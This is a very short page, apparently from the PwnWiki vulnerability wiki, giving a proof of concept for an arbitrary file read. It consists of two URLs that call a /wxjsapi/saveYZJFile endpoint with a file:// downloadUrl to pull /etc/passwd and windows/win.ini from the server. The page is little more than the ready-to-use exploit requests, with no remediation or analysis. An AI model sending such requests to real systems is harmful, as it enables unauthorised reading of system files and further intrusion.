免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
POC
http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
pwnwiki.com
◆◆0
